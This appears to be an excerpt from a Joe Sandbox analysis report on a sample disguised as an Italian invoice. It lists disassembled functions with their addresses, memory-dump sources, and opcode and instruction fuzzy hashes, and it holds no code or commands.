Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f6543890121bbaf0f400264b57cce2dfe377fa58704c17e326218bcac4974d9
Instruction ID: a1c432cc7c5ac17042ef4e27bbeb69ecdae63e201173fe1bca6fe92f44f01cf0
Opcode Fuzzy Hash: 0f6543890121bbaf0f400264b57cce2dfe377fa58704c17e326218bcac4974d9
Instruction Fuzzy Hash: 10414C71E003089FEB24DFA5D8947ADFBF2AF85394F148469D505AB790DB70AC46CB90

Function 02F98633 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40de7eeec9637e490dbe349b8d7db815d0ebb6d704ac3a6a021ee73dd82e96d6
Instruction ID: 9ab5b245364dcb5ce6865e2728cf904f9fc16109df26b14092e48ba0d4a881b9
Opcode Fuzzy Hash: 40de7eeec9637e490dbe349b8d7db815d0ebb6d704ac3a6a021ee73dd82e96d6
Instruction Fuzzy Hash: D0415D356002049FDB18DF68D5909AE77F2FF89764B5084ADE9059F361DB32EC42CBA1

Function 02F92F20 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98cf9d276301d1991ca6ecfa345ca1f2c02e70aec51791b686e4a50784dd52f9
Instruction ID: 1928d58088044c3ff9ce90b39c8fc824069567e1ca20c522e7947f4013484fb4
Opcode Fuzzy Hash: 98cf9d276301d1991ca6ecfa345ca1f2c02e70aec51791b686e4a50784dd52f9
Instruction Fuzzy Hash: 56416874E00605DFDB19CF48C494AAAF7B1FF48358B1581A9D902AB3A5C336FD91CBA4

Function 02F99980 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff038b5306adbfef699fd2f0bfad64c74963cc65c614a050ec5360758d37670
Instruction ID: 66e4d6efce47336c3dfa606b3b473387dccd8172e141dedf1262d87b71c401cf
Opcode Fuzzy Hash: dff038b5306adbfef699fd2f0bfad64c74963cc65c614a050ec5360758d37670
Instruction Fuzzy Hash: 0731D231E00218CFEF14DB68D45ABEEBBF2EF48350F124469E506AB290CBB55C44CBA1

Function 02F987F0 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a648fe41a7346ab82964a580d5f99be3343be45b2d2257ec93009e5ab5956e
Instruction ID: 0efd72c1c2c89e62d2d75e07e66fe6a95af3ee671c0c1d3cd37b27b642137002
Opcode Fuzzy Hash: f4a648fe41a7346ab82964a580d5f99be3343be45b2d2257ec93009e5ab5956e
Instruction Fuzzy Hash: DF4128346002009FDB289F78C990D6A7BB3FB89314B50897DE9164B761DB32EC45CBA1

Function 02F99990 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0163c4b667de45b9373f231728a9b3bed5a9100195981ed2d4793025bb4fc297
Instruction ID: db7faa76c77c315f2a9c7c9533ed7842708e6b589b3e684c73e925233e63031c
Opcode Fuzzy Hash: 0163c4b667de45b9373f231728a9b3bed5a9100195981ed2d4793025bb4fc297
Instruction Fuzzy Hash: 6C31BE31E00218CFEB14DB68C45ABEEB7F2EB48740F124479E906AB294CBB59C44CB91

Function 02F9A8F1 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54a42dc49545986f821fef13e77bafd790e610b900358dc9a5d61f7516ae0ef7
Instruction ID: f201b8fe933476bda86bde91d26f65ec4ecc28479a16cab8602d5c8837473b69
Opcode Fuzzy Hash: 54a42dc49545986f821fef13e77bafd790e610b900358dc9a5d61f7516ae0ef7
Instruction Fuzzy Hash: B821DC30B0020A8FEB11DB68D855AAF7BF6FF85340B1684AAE505DB254EF309D058B91

Function 02F1D9A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1374985420.0000000002F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f1d000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23d9441884bbd9ba40543eb571ca11752016f178595539ab7acb802d9d44d52a
Instruction ID: 6df575f6ba12004a3b65571aa3f9b763a2db8ed82103a791bbec374c480ad15e
Opcode Fuzzy Hash: 23d9441884bbd9ba40543eb571ca11752016f178595539ab7acb802d9d44d52a
Instruction Fuzzy Hash: FA21F572A08244EFDB15DF10D9C0B16BFB5FB88354F64856DEA090B29BC336D456CBA2

Function 02F2D01C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375218734.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f2d000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6ef7597c7729b39922083b52282af10864e30b88aef985479aafd48e233ba23
Instruction ID: dff08284a4dd1aff68a628ecfb7f01234f5657324971bb932627fa870367d845
Opcode Fuzzy Hash: a6ef7597c7729b39922083b52282af10864e30b88aef985479aafd48e233ba23
Instruction Fuzzy Hash: D5213772A04240DFDB14DF10D9C4B16BBA5FB85B54F24C569EA090F25AC336D44BCBB2

Function 02F2D005 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375218734.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f2d000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 257cddf37292fe4ac1704418c8895ce55bc65552960ffda3971707f1203628fc
Instruction ID: 0970a2b6e356b2926eb531a19ca6567ba03e706b164b4f09ae7602280e86bee1
Opcode Fuzzy Hash: 257cddf37292fe4ac1704418c8895ce55bc65552960ffda3971707f1203628fc
Instruction Fuzzy Hash: 3121B0714093C08FCB12CF20D994715BF71EB86614F2881DAD9448B667C33A980ACB62

Function 02F1D99B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1374985420.0000000002F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f1d000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a06c64c2b8b65df030149850173b9db908b49981af2f88c732e329f1606b4a2f
Instruction ID: d7594a8e9075d0b0c2b87e3a596db94f7a6fbd6ed8e0c702e0eaa71b72403c67
Opcode Fuzzy Hash: a06c64c2b8b65df030149850173b9db908b49981af2f88c732e329f1606b4a2f
Instruction Fuzzy Hash: 20119376908244DFCB15CF14D5C4B16BF71FB84324F28C6A9DA094B657C336D456CBA1

Function 02F9DEE8 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4a81040e63146b1ba4317d969e84d32bf048f1e774c033faf323c287322a6c2
Instruction ID: 792f849241fd5147660392331544f74881a00d5164272313a1e4bec38e804446
Opcode Fuzzy Hash: d4a81040e63146b1ba4317d969e84d32bf048f1e774c033faf323c287322a6c2
Instruction Fuzzy Hash: 7611B971B11208CBFF14DBA9D446BAAB7B6FBC4399F258431D70587255D734AC15CB80

Function 02F9AD89 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ee232e41e64042e7de1cf1c108c2e530731bf3905439b9fad70746b334ecb42
Instruction ID: 69012764764d5f8b7bfee9329de346dc90e35a8cddab57b1049fd9ae3a65d6a6
Opcode Fuzzy Hash: 7ee232e41e64042e7de1cf1c108c2e530731bf3905439b9fad70746b334ecb42
Instruction Fuzzy Hash: AF115A31E00209CFEF14DF6AD8487EAB7B6FB88345F10C176EA0667254DB399985CB91

Function 02F9AD98 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ef24b89d23ce867b19f46e7267d2cdc813ebc7bbe66ef7a1fe808792900e6a2
Instruction ID: 2353263825e7c6494b981b3044a4cc1a29f2c439802bc37703cbb6266be1f50f
Opcode Fuzzy Hash: 6ef24b89d23ce867b19f46e7267d2cdc813ebc7bbe66ef7a1fe808792900e6a2
Instruction Fuzzy Hash: C6116D30E00209CFFF14DB6AD8487EAB3B6FB88345F10C536D60667254DB78A885CB95

Function 0A35F370 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb6bf69b742ae9fab497c6bb952723aeb857536afe95a40502182f6ca5697f59
Instruction ID: 304f77dabe942070b30b15d5bc38cd78ba03ae53243832185ec06da010a6267b
Opcode Fuzzy Hash: fb6bf69b742ae9fab497c6bb952723aeb857536afe95a40502182f6ca5697f59
Instruction Fuzzy Hash: D811F3B4E0030A9FDB44EFA9C9457AFBBF1BF88300F50806A9518B7354DA309A018FA5

Function 02F9A9F0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53737b717586c1eba60d039ff68fc6d6b2c39acda07e1ccc58a988d81287929c
Instruction ID: 4d9d86963963d0997c3623c64b99e5917172e3ba4e045e7fe41a18f51068ed56
Opcode Fuzzy Hash: 53737b717586c1eba60d039ff68fc6d6b2c39acda07e1ccc58a988d81287929c
Instruction Fuzzy Hash: A8019E30E00248DFEB04DB78D8157AEBBF6EF84300F1480AAD405D3245EB345A45CB41

Function 02F1D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1374985420.0000000002F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f1d000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4da382df4a4f6cf780fa9ae0ac95e6e26c58187e4e85809653f702036d236e7f
Instruction ID: 1818c0a6ecb964ad53157993629edd2726e456b417436cf8a8d8314e6e6c81c1
Opcode Fuzzy Hash: 4da382df4a4f6cf780fa9ae0ac95e6e26c58187e4e85809653f702036d236e7f
Instruction Fuzzy Hash: AC01DB72904340AFE7204E26CDC4767BBE8DF41AA4F58C51ADE480F246C3799441CAB5

Function 02F1D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1374985420.0000000002F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f1d000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2955e75b357d34a138f0d02d9c876943a140ef84ac27eeceb3a31e7b38a6825
Instruction ID: d92495733196efb0e960d5aeae4d2b2b4c0397b70c25143b98d829c9cb553d7a
Opcode Fuzzy Hash: d2955e75b357d34a138f0d02d9c876943a140ef84ac27eeceb3a31e7b38a6825
Instruction Fuzzy Hash: E4015E6140E3C09FD7228B258994B62BFB8DF43624F1DC1DBD9888F2A7C2695849C772

Function 02F9AE2F Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672adb0fcae1c1a8e74f6aeb5f6d9521e4db7766b0fb005e6eef7c3727735371
Instruction ID: 1c08ba69c70bab99431b44d1d6d3f554f6d16099eef37f44a4168d36739f0734
Opcode Fuzzy Hash: 672adb0fcae1c1a8e74f6aeb5f6d9521e4db7766b0fb005e6eef7c3727735371
Instruction Fuzzy Hash: 02113530E00209CFFF24CB6AC848BE9B3B6FB88346F10C466D6069A254DB389885CB55

Function 02F9B691 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50996c54d4a360f62379aeabb95db0d8819b483519d7987bcd2d458af2ac2fd8
Instruction ID: b1b9bcb8ad1776c075770cee8064c342e8f62558f044eda659049a89326ec913
Opcode Fuzzy Hash: 50996c54d4a360f62379aeabb95db0d8819b483519d7987bcd2d458af2ac2fd8
Instruction Fuzzy Hash: 9B01F431708358DFEB05CB68F40479A7FE9DB49364F1440FBE508C7249C636A890CB15

Function 02F9AA00 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dfd19e8c6ab2ea0bd7b16ec21fae54d086ee91ae2bc163796c8a04bed54d74b
Instruction ID: 3071cfe32df9974f57073bbff377bae395a2cef19a88ab9d234c7d5e9ba3c8dd
Opcode Fuzzy Hash: 4dfd19e8c6ab2ea0bd7b16ec21fae54d086ee91ae2bc163796c8a04bed54d74b
Instruction Fuzzy Hash: E901FB30E00248DFEB14EBA9D9557EEBBF6EB84351F1480A9D50993244EF345A56CB81

Function 0A342475 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b585e5f3dce133e80b1456b509a82bd210b73f35922aada9ff5bde8acc3b200
Instruction ID: 2d6d38d64d90bfb85edd03e21cdd6f89e3eb7e2f281fd2b21c8d3238856a6351
Opcode Fuzzy Hash: 3b585e5f3dce133e80b1456b509a82bd210b73f35922aada9ff5bde8acc3b200
Instruction Fuzzy Hash: 3401A9B8A042288FDB24DF28D9455DDB7F1EB48340F1050D9D90DA3785DB345D868F55

Function 02F930A9 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51c6362e11b357a35636b5dc528ceb2ea238bbe352b9011782020a3175dc019f
Instruction ID: 37f378e44567b321037b73698e30138a9b329de32f3fd52f5d84b5fc58131567
Opcode Fuzzy Hash: 51c6362e11b357a35636b5dc528ceb2ea238bbe352b9011782020a3175dc019f
Instruction Fuzzy Hash: 1EF0F935A00105DFDF15CB9DD890AEEFBB1FF88328F248195E515AB261C736AD52CB50

Function 02F9AE60 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8b825dc4d4716a52bda53f671f84696e28b27033cc6a204958f20a29a5c2dc2
Instruction ID: 7efa155dedd205ae0cbef865de88ad1b2ad69e2d78d94ca152cd7642732b4efb
Opcode Fuzzy Hash: c8b825dc4d4716a52bda53f671f84696e28b27033cc6a204958f20a29a5c2dc2
Instruction Fuzzy Hash: 2EF02B342046845FC3019B79D4295993FF9AF8A65171440E5F889CB367DA359C01C7A1

Function 02F97AF5 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91c811bdd4a62295c30a4db51a41c2a1fe5e11c710f458cc3e1641003415abb9
Instruction ID: 83db8373f9c867990f1d383b0aa6b672a2c5504a7f66e0739637878a33494709
Opcode Fuzzy Hash: 91c811bdd4a62295c30a4db51a41c2a1fe5e11c710f458cc3e1641003415abb9
Instruction Fuzzy Hash: 29F01C70F0030ADFEB14DFA0D855BAE77B2EB44744F108958D602AF295CB78AD498B80

Function 0A35A6B0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3111643bbd3332be90d638c0c91e476e3503bf169e13ea5217d538d9bf8d2e0
Instruction ID: 56ca6eb173c1d6bddba8cb162ee69e1141ab8c9655589f7c4687380871037bd8
Opcode Fuzzy Hash: f3111643bbd3332be90d638c0c91e476e3503bf169e13ea5217d538d9bf8d2e0
Instruction Fuzzy Hash: 17E0C274E04208EFCB94EFA8D555AADBBF8EB48340F10C1AA9C18A3351D6359A51EF84

Function 0A355ED0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3111643bbd3332be90d638c0c91e476e3503bf169e13ea5217d538d9bf8d2e0
Instruction ID: 7312a2bc2ae6563c401d87408ed8c8fb925aa66bc9840aafcccc9c66fa372c6d
Opcode Fuzzy Hash: f3111643bbd3332be90d638c0c91e476e3503bf169e13ea5217d538d9bf8d2e0
Instruction Fuzzy Hash: CEE0ED74D04208EFCB54DFA9D545AADFBF4EB48300F10C0AA9C1893341D735AA51DF80

Function 0A347B0B Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddecd6a442e101ebfbbbd6c8717149fb444bb49f05922b2f09a418fd04159cce
Instruction ID: a6bb674f5bb0dd6a1e9874101077e2031c7b776ba4d5f1a9397e0a6599690e74
Opcode Fuzzy Hash: ddecd6a442e101ebfbbbd6c8717149fb444bb49f05922b2f09a418fd04159cce
Instruction Fuzzy Hash: 59F054B4B102189FDB18DF28C944E4A77B5FB49300F0180D4E90DA7745CB345E80CF51

Function 0A35BCC8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3111643bbd3332be90d638c0c91e476e3503bf169e13ea5217d538d9bf8d2e0
Instruction ID: 52c957fa96a6233a8be361c6ed71b951bc366bcb3bf963cf448ab92a89f463cd
Opcode Fuzzy Hash: f3111643bbd3332be90d638c0c91e476e3503bf169e13ea5217d538d9bf8d2e0
Instruction Fuzzy Hash: EFE0AE74E04208EFCB54EFA9D545AADFBF8AB49301F10C1AA9808A3341EA359A51DF84

Function 02F9AFE8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53e8b1b64b874cd0669e8a5e38af0471847fc6de0660ad81596bc9120896cf9
Instruction ID: 2c1c0ef8967a23cc85303c8366d0fe8f1cd461c468b5e5f5d9b833264203d6c1
Opcode Fuzzy Hash: a53e8b1b64b874cd0669e8a5e38af0471847fc6de0660ad81596bc9120896cf9
Instruction Fuzzy Hash: 1FF0F8B1E01208DFDF44CFA5D8947EDBBB1BB49348F548465E512AB2A4EB38A944CF14

Function 0A355E38 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e2d6d5d4980924f7b827f150d2db3bd1da1712911ace95c676208c44c9b5528
Instruction ID: ed49b58a78cef1d869bcd0729633c88e59f0311966d0f9df271e33167a6bc4e9
Opcode Fuzzy Hash: 4e2d6d5d4980924f7b827f150d2db3bd1da1712911ace95c676208c44c9b5528
Instruction Fuzzy Hash: CCE0E574E04208EFCB54DFA9D585AACBBF8EB48301F10C0AA881893341D635AA02DF80

Function 0A35EE90 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0be9e215e9b22f573a74601ed3949a8f24c4dcfc39713ccdc21dd327be9dc88
Instruction ID: c3d1ef6bff5c0dda3a43a972f6ed68d151d8a34b7183e5abfaeae6a21d6f496b
Opcode Fuzzy Hash: b0be9e215e9b22f573a74601ed3949a8f24c4dcfc39713ccdc21dd327be9dc88
Instruction Fuzzy Hash: 19E04F70D5A20CEBD754EFBDD6457AEBBF9DB08301F2080A98C0D93381D6345A40CB91

Function 0A35A350 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e2d6d5d4980924f7b827f150d2db3bd1da1712911ace95c676208c44c9b5528
Instruction ID: 46ad707ba78a1156905a3ac3a5727f1ce279704ccb33f7d3d46889b2ece007d0
Opcode Fuzzy Hash: 4e2d6d5d4980924f7b827f150d2db3bd1da1712911ace95c676208c44c9b5528
Instruction Fuzzy Hash: 16E0E574E04208EFCB94DFA8D545AACBBF8EB49305F10C1AA981893341D6359A01DF80

Function 02F930B9 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 338407a44c199e6ea4855c314eabab07b6944c0e40ac74392246e483eb98f9fd
Instruction ID: cae4163c0d8722fe75aee4e3cedeb99130b9f755464a8ce4341c94a77a155582
Opcode Fuzzy Hash: 338407a44c199e6ea4855c314eabab07b6944c0e40ac74392246e483eb98f9fd
Instruction Fuzzy Hash: 2CE01275A04144CFDB10CB98D8507ACB3B1EF8933DF2581D6D5199B2A1C7379D06CB50

Function 02F9E760 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0267d7c692b38a52d4f48a46f1e3c887621306f44c64f9e4f000c9f7f88ff7d1
Instruction ID: 5123a788290c5f23647123d9fb50ae92d5eb1ba7ba8392b18b041324dd676c98
Opcode Fuzzy Hash: 0267d7c692b38a52d4f48a46f1e3c887621306f44c64f9e4f000c9f7f88ff7d1
Instruction Fuzzy Hash: 02E0C230B1020ECFFF10CAB5B40932173CAA784B99F54C473E71C82404DB3698418103

Function 0A358B30 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60d4c710fc000feda70fde5c1a13d436440a1ad48879684c28e7279742b33293
Instruction ID: 2e731e5fd152b4f10cdc77601dc79e40a8bc410bc00530e6590c6bd7474edd05
Opcode Fuzzy Hash: 60d4c710fc000feda70fde5c1a13d436440a1ad48879684c28e7279742b33293
Instruction Fuzzy Hash: DAE012B4D08208EFCB14DBA8D542AACFBF9AB89201F14C0AA8C1853351C6359A02EF80

Function 0A35E248 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01dc0c37abb6a964d4278eeb9bf324d4cd55f3dfa22646675628c4b8e8e8f88e
Instruction ID: ecb2bc06f730b34b7934d17518d1ba4e8acb812fe5ee133bafc4341259086fba
